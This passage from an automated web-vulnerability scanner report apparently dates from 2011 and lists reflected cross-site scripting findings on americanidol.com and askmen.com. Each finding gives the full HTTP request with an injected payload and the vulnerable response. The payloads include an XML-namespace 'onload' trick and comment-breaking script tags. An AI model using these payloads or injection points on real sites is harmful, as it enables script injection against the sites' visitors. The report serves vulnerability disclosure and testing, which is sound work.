This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:13:09 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyc4217<a>ba34a50088c/12?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.118. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19773<a>f6cff111e75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:10 GMT
Content-Length: 15316
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/1219773<a>f6cff111e75?feed=1&dfpzone=idol_home]]>
...[SNIP]...

1.119. http://www.americanidol.com/videos/hot/qty/12 [dfpzone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of the dfpzone request parameter is copied into the XML document as plain text between tags. The payload 2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 was submitted in the dfpzone parameter. This input was echoed as 2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home2c922<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4db02091615 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172796
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 19200
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[{"rating":"4.8","totalvotes":"11","dfpzone":"idol_home2c922<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4db02091615","video_slug":"who_is_most_likely_tweet","itunes_url":"","season":"10","fallbackID":"74091","playlist_slug":"idols_live_tour","playlist_season":"10","playlist_title":"Idols Live Tour"}]]>
...[SNIP]...

1.120. http://www.americanidol.com/videos/hot/qty/12 [feed parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload f13a1<a>a7ef02b2c8e was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:02 GMT
Content-Length: 18048
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1f13a1<a>a7ef02b2c8e&dfpzone=idol_home]]>
...[SNIP]...

1.121. http://www.americanidol.com/videos/hot/qty/12 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5d505<a>8940690ae14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:13:06 GMT
Content-Length: 18051
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12?feed=1&dfpzone=idol_home&5d505<a>8940690ae14=1]]>
...[SNIP]...

1.122. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f834c<a>d03fcb067cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172775
Date: Tue, 04 Oct 2011 20:07:13 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qtyf834c<a>d03fcb067cc/12/?feed=1]]>
...[SNIP]...

1.123. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cb92<a>dde1bcc21a8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172782
Date: Tue, 04 Oct 2011 20:07:17 GMT
Content-Length: 15299
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/128cb92<a>dde1bcc21a8/?feed=1]]>
...[SNIP]...

1.124. http://www.americanidol.com/videos/hot/qty/12/ [feed parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 3d9af<a>8a041e21996 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=13d9af<a>8a041e21996 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172800
Date: Tue, 04 Oct 2011 20:06:09 GMT
Content-Length: 18031
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=13d9af<a>8a041e21996]]>
...[SNIP]...

1.125. http://www.americanidol.com/videos/hot/qty/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6441<a>9e35cfbb954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/swf/videoPlayer/v3r1/AmericanIdolPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Cache-Control: max-age=172795
Date: Tue, 04 Oct 2011 20:06:43 GMT
Content-Length: 18034
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Hot Videos</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/videos/hot/qty/12/?feed=1&d6441<a>9e35cfbb954=1]]>
...[SNIP]...

1.126. http://www.askmen.com/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6036--><script>alert(1)</script>748fd2d4c5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /apie6036--><script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762?_=1317758821320 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; rsi_segs=; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; show_snazzy_title2=2

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38712
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:02 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : apie6036--><script>alert(1)</script>748fd2d4c5b/articles/getTodaysArticles/country:us.json/-->

1.127. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b742c--><script>alert(1)</script>8a0f8c6be90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includesb742c--><script>alert(1)</script>8a0f8c6be90/js/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:06:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:06:58 GMT
Connection: close
